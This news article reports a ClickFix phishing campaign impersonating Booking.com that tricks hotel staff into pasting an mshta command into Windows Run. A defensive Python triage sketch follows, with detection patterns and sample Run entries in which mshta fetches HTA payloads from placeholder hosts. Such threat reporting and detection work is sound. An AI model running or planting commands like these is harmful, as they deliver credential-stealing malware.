Microsoft Threat Intelligence has identified an ongoing phishing campaign impersonating Booking.com to deliver credential-stealing malware. The attackers send fake emails purporting to be from Booking.com, with content ranging from negative guest reviews to account verification requests. These messages contain malicious links or PDF attachments leading to fraudulent websites that mimic Booking.com’s legitimate pages, creating a convincing illusion to trick unsuspecting victims.

When victims click the malicious links, they see a webpage with a fake CAPTCHA overlay instructing them to use a keyboard shortcut to open Windows Run and paste a command that’s automatically copied to their clipboard. The design mimics legitimate security verification systems, giving victims a false sense of security. This command typically uses mshta.exe to download malicious code, such as: “mshta # ‘I am not a robot – reCAPTCHA Verification ID: 3781’”. This seemingly innocuous command initiates the download of dangerous malware without triggering conventional security alerts.

Security analysts at Microsoft noted that this campaign employs a technique called “ClickFix,” which displays fake error messages instructing users to execute commands that download malware. The addition of ClickFix to their tactics shows how this threat actor evolves to circumvent security measures, specifically targeting hospitality staff who regularly interact with Booking.com as part of their duties. This social engineering method takes advantage of human problem-solving tendencies to bypass conventional security measures by requiring user interaction rather than relying on automated execution.

The malware’s capabilities include stealing stored passwords from browsers, capturing financial information, and potentially providing remote access to compromised systems, allowing attackers to conduct further malicious activities within the victim’s network.

Tushar is a cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in cyber security, he covers cyber security news, technology and other news.
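For defenders, the pasted Run-dialog command described above leaves a reviewable trace. The following triage sketch is an added example, not code from Microsoft or from this article: it assumes Run-dialog history exported from the RunMRU registry key, the entries and hosts are constructed placeholders, and the names assess and triage are hypothetical.

```python
import re

# Constructed sample entries in the style of RunMRU registry values
# (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), where
# Windows keeps Run-dialog history with a trailing "\1". Hosts are placeholders.
SAMPLE_RUN_HISTORY = [
    r"cmd\1",
    r"mshta https://verify.example.invalid/c # 'I am not a robot - reCAPTCHA Verification ID: 3781'\1",
    r"mshta.exe C:\Tools\inventory.hta\1",
    r"notepad # reCAPTCHA notes\1",
    r'"C:\Windows\System32\MSHTA.EXE" http://cdn.example.invalid/a.hta\1',
]

# mshta invoked bare, with .exe, or by quoted full path.
MSHTA = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?mshta(?:\.exe)?"?(?=\s|$)', re.I)
# A URL or UNC path as the content source.
REMOTE = re.compile(r"\b(?:https?|ftp)://|\\\\[\w.-]+\\", re.I)
# Decoy wording of the kind quoted in the article.
LURE = re.compile(r"not a robot|captcha|verif(?:y|ication)|human", re.I)

def assess(entry):
    """Return the list of ClickFix indicators found in one Run-dialog entry."""
    cmd = entry[:-2] if entry.endswith("\\1") else entry
    cmd = cmd.strip()
    # In the article's sample, the text after "#" is the decoy the victim
    # reads; split it off and inspect it separately from the command itself.
    command, _, trailer = cmd.partition(" #")
    hits = []
    if MSHTA.search(command):
        hits.append("mshta")
        if REMOTE.search(command):
            hits.append("remote-source")
    if trailer and LURE.search(trailer):
        hits.append("verification-lure")
    return hits

def triage(entries):
    """Flag entries where mshta is combined with a remote source or a lure."""
    flagged = []
    for e in entries:
        hits = assess(e)
        if "mshta" in hits and len(hits) > 1:
            flagged.append((e, hits))
    return flagged
```

A local .hta launch or a stray mention of "reCAPTCHA" alone is not flagged; only mshta combined with a remote source or verification wording is, which keeps the check focused on the pattern this campaign uses.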
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 14 Mar 2025 11:10:13 +0000